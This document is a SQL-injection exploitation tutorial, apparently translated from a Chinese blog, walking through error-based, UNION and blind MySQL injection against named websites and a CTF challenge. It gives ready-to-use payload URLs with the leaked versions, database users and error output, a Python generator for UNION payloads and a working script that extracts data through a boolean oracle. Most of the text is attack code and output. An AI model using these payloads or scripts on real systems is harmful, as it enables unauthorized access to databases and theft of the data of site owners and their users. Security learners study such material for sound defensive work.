Manual exploitation of MySQL injection vulnerabilities

MySQL:
Error-based injection:
Take http://www.hexie.com/main/articleDetail.php?id=757 as the example.
http://www.hexie.com/main/articleDetail.php?id=757'
throws a database error, so the id parameter is injectable and the page echoes the raw error text back to the client. (In the payloads below, %23 is the URL-encoded # comment character; a raw # would be treated by the browser as the URL fragment and never reach the server.)
Method one (floor(rand(0)*2) with GROUP BY, duplicate-key error):
(1) http://www.hexie.com/main/articleDetail.php?id=757' and (select 1 from (select count(*),concat( version(),floor(rand(0)*2))x from information_schema.tables group by x)a) %23
leaks the version number: 5.5.20
Error message: MySQL Query Error:select * from knowledge where id='757' and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) #':Duplicate entry '5.5.201' for key 'group_key'
rand(0) produces a fixed sequence, so while GROUP BY fills its temporary table the same key is computed twice and the second insert fails with a duplicate-key error that echoes the key. The trailing 1 in '5.5.201' is the floor(rand(0)*2) value that concat() appended, not part of the version; strip it when reading the result.
(2) Replace version() with any other scalar subquery to read more:
www.hexie.com/main/articleDetail.php?id=757' and (select 1 from (select count(*),concat( (select User from mysql.user limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x )a) %23
leaks the user name: phmisdbuser
Error message: MySQL Query Error:select * from knowledge where id='757' and (select 1 from (select count(*),concat((select User from mysql.user limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x )a) #':Duplicate entry 'phmisdbuser1' for key 'group_key'
Method two (extractvalue() XPath syntax error):
(1) www.hexie.com/main/articleDetail.php?id=757' and extractvalue(1, concat(0x5c, version())) %23
leaks the version number: 5.5.20
Error message: MySQL Query Error:select * from knowledge where id='757' and extractvalue(1, concat(0x5c,version())) #':XPATH syntax error: '\5.5.20'
(2) www.hexie.com/main/articleDetail.php?id=757' and extractvalue(1, concat(0x5c, (select User from mysql.user limit 1,1))) %23
leaks the user name: phmisdbuser
Error message: MySQL Query Error:select * from knowledge where id='757' and extractvalue(1, concat(0x5c,((select User from mysql.user limit 1,1)))) #':XPATH syntax error: '\phmisdbuser'
Method three (updatexml() XPath syntax error):
(1) www.hexie.com/main/articleDetail.php?id=757' and 1=(updatexml(1,concat(0x5e24, (select version()),0x5e24),1)) %23
leaks the version number: 5.5.20
Error message: MySQL Query Error:select * from knowledge where id='757' and 1=(updatexml(1,concat(0x5e24,(select version()),0x5e24),1)) #':XPATH syntax error: '^$5.5.20^$'
(2) www.hexie.com/main/articleDetail.php?id=757' and 1=(updatexml(1,concat(0x5e24, (select User from mysql.user limit 1,1),0x5e24),1)) %23
leaks the user name: phmisdbuser
Error message: MySQL Query Error:select * from knowledge where id='757' and 1=(updatexml(1,concat(0x5e24,(select User from mysql.user limit 1,1),0x5e24),1)) #':XPATH syntax error: '^$phmisdbuser^$'
The 0x5c (\) and 0x5e24 (^$) prefixes only exist to make the XPath expression invalid and to mark where the leaked value starts. Note that MySQL truncates XPath error output to 32 characters, so a long value must be read in windows with substring(expr, offset, 32); the GROUP BY method does not have this limit but needs the subquery to return exactly one row.


Common MySQL information-gathering queries (each can replace version() in the payloads above):
【1】user(): the current database user
【2】select database(): the current database
【3】SELECT SCHEMA_NAME FROM information_schema.SCHEMATA limit 1,1: list all databases, one per query
【4】Walk all tables one at a time: select table_name from information_schema.tables where table_schema='database name' limit 1,1
【5】Walk the columns of one table one at a time: select COLUMN_NAME from Information_schema.columns where table_Name = 'table name' and TABLE_SCHEMA='database name' limit 1,1
【6】Walk the rows one at a time: select column_name from database_name.table_name limit 1,1 (Ps: each query returns one value of one column; the error-based subquery must return a single row, so step through the rows by changing the offset in limit N,1, where offset 0 is the first row and limit 1,1 is the second)
【7】Query host information: select Host from mysql.user limit 1,1

Union injection:
Example: http://www.hunyinshe.com/list.php?id=1
【1】First, work out how many columns the original query returns, using order by:
http://www.hunyinshe.com/list.php?id=1 order by 1 -- (page renders normally)
http://www.hunyinshe.com/list.php?id=1 order by 2 -- (page renders normally)
………………
http://www.hunyinshe.com/list.php?id=1 order by 32 -- (page renders normally)
http://www.hunyinshe.com/list.php?id=1 order by 33 -- (page breaks)
So the query returns 32 columns; a UNION must supply exactly that many values. (MySQL only treats -- as a comment when a space follows it, so type it as "-- " or URL-encode it as --+.)
【2】Find the current database name (and 1=2 empties the original result set so the UNION row is what the page displays; database() goes in the column position the page renders, column 2 here):
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 --
【3】List all databases:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.SCHEMATA --
【4】List all table names:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.tables --
【5】List the tables in the database named mysql:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.tables where table_schema= 0x6d7973716c--
(Ps: 0x6d7973716c is the hex encoding of "mysql"; a hex literal needs no quotes, so it works even when quotes are escaped or filtered)
【6】List the tables in the database named xjdj:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.tables where table_schema= 0x786a646a--
【7】List the columns of table cmsdj_user in database xjdj:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,COLUMN_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from Information_schema.columns where table_Name = 0x636d73646a5f75736572 and TABLE_SCHEMA=0x786a646a--
【8】Read the data in column cd_name of table cmsdj_user in database xjdj:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from database_name.table_name limit 1,100 --

(Ps: limit 1,100 returns 100 rows starting from the second row, because the offset starts at 0. A page that renders only one row shows a single value per request; group_concat(column_name) packs many rows into one value, up to the group_concat_max_len limit of 1024 bytes by default.)
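The steps above are mechanical once the column count is known. The following Python is added here as an example and is not code from the original post: it automates the order by column count probe against a constructed stand-in for list.php (a real run would replace page_ok() with an HTTP request and a check of the response), hex-encodes string literals the way 0x6d7973716c is used above, and builds the UNION payloads with the probe expression in the column the page displays. The column count of 32 and the display column are assumptions matching the walkthrough.

```python
# Added example: automate the union-injection steps above against a simulated page.
# page_ok() is a constructed oracle standing in for the real list.php; everything
# else builds the same payloads the walkthrough types by hand.

TRUE_COLUMNS = 32   # assumed column count of the simulated backend query


def page_ok(payload):
    """Constructed oracle: the simulated page renders normally only while ORDER BY n <= 32."""
    n = int(payload.split("order by")[1].split("--")[0])
    return n <= TRUE_COLUMNS


def find_column_count(oracle, limit=100):
    """Raise ORDER BY n until the page breaks; the last working n is the column count."""
    for n in range(1, limit + 1):
        if not oracle("1 order by %d -- " % n):
            return n - 1
    return None   # more than `limit` columns, or the oracle never fails


def to_hex(s):
    """'mysql' -> 0x6d7973716c: a hex literal needs no quotes, so it survives quote escaping."""
    return "0x" + s.encode().hex()


def union_payload(ncols, display_col, expr, tail=""):
    """Build `1 and 1=2 union select ...` with expr in the 1-based column the page displays."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[display_col - 1] = expr
    return "1 and 1=2 union select %s%s -- " % (",".join(cols), (" " + tail) if tail else "")


def tables_of(db, ncols, display_col):
    return union_payload(ncols, display_col, "table_name",
                         "from information_schema.tables where table_schema=%s" % to_hex(db))


def columns_of(db, table, ncols, display_col):
    return union_payload(ncols, display_col, "COLUMN_NAME",
                         "from information_schema.columns where table_name=%s and table_schema=%s"
                         % (to_hex(table), to_hex(db)))


def dump(db, table, column, ncols, display_col):
    """Read many rows in one request with group_concat instead of paging with limit."""
    return union_payload(ncols, display_col, "group_concat(%s)" % column,
                         "from %s.%s" % (db, table))


if __name__ == "__main__":
    ncols = find_column_count(page_ok)
    print("columns:", ncols)
    print(tables_of("xjdj", ncols, 2))
    print(columns_of("xjdj", "cmsdj_user", ncols, 2))
    print(dump("xjdj", "cmsdj_user", "cd_name", ncols, 2))
```

The display column is found the same way the walkthrough does it: put a recognisable literal in each position of the UNION row and see which one appears in the page; the walkthrough's payloads show it is column 2.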


Blind injection:

Take
http://ctf1.simplexue.com/basic/inject/index.php?admin=admin&pass=f&action=login
as the example.
【1】Leak the database version:
http://ctf1.simplexue.com/basic/inject/index.php?admin=admin' and (ascii(substring(version(),1,1))>0) #&pass=f&action=login
shows "wrong username" (the injected condition is true)
http://ctf1.simplexue.com/basic/inject/index.php?admin=admin' and (ascii(substring(version(),1,1))<0) #&pass=f&action=login
shows "database connection failed" (the injected condition is false)
The two responses form a boolean oracle: nothing from the database is echoed, but a true and a false condition produce different pages, so each character of any value can be recovered by comparing its ASCII code against a guess.

I wrote a small program to speed this up.



# -*- coding: utf-8 -*-
import urllib.request
import urllib.parse

# Subquery whose result is extracted one character at a time; change it to read other data
sqlcomm = "(SELECT SCHEMA_NAME FROM information_schema.SCHEMATA limit 1,1)"

BASE = "http://ctf1.simplexue.com/basic/inject/index.php?"
HEADERS = {"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"}
data = {"admin": "", "pass": "f", "action": "login"}


def query(condition):
    """Send one injected condition in the admin parameter.
    Returns True when the page does NOT contain the 'database connection failed'
    text, i.e. when the condition evaluated to true on the server."""
    data["admin"] = "admin' and (%s) #" % condition
    url = BASE + urllib.parse.urlencode(data)
    req = urllib.request.Request(url, headers=HEADERS)
    resul = urllib.request.urlopen(req).read().decode('gbk')
    return resul.find(u'数据库连接失败') == -1      # look for the Chinese error text


def getlength():
    # Probe the length of the result linearly and stop at the first match
    for counti in range(1000):
        if query("length(%s)=%s" % (sqlcomm, counti)):
            print(counti)
            return counti
    return False


def sendhttp(countn, sign, num):
    # Compare the ASCII code of character countn (1-based) of sqlcomm with num
    return query("ascii(substring(%s,%s,1))%s%s" % (sqlcomm, countn, sign, num))


coutnum = getlength()
for j in range(1, coutnum + 1):
    lo, hi = 0, 140
    while lo <= hi:
        middle = (hi + lo) // 2
        if sendhttp(j, "=", middle):
            print(chr(middle), end='')
            break
        if sendhttp(j, ">", middle):
            lo = middle + 1
        else:
            hi = middle - 1

Just change the sqlcomm variable to retrieve whatever data you want.
Ps: a quick note on the MySQL functions used:
substring(str,start,length): returns a substring; str is the string to cut, start is the 1-based position to start from, length is how many characters to take
ascii(str): returns the ASCII code of the first character of str
length(str): returns the length of str in bytes (use char_length() when the value may contain multi-byte characters)

The commonly used queries are listed above under "Common MySQL information-gathering queries".
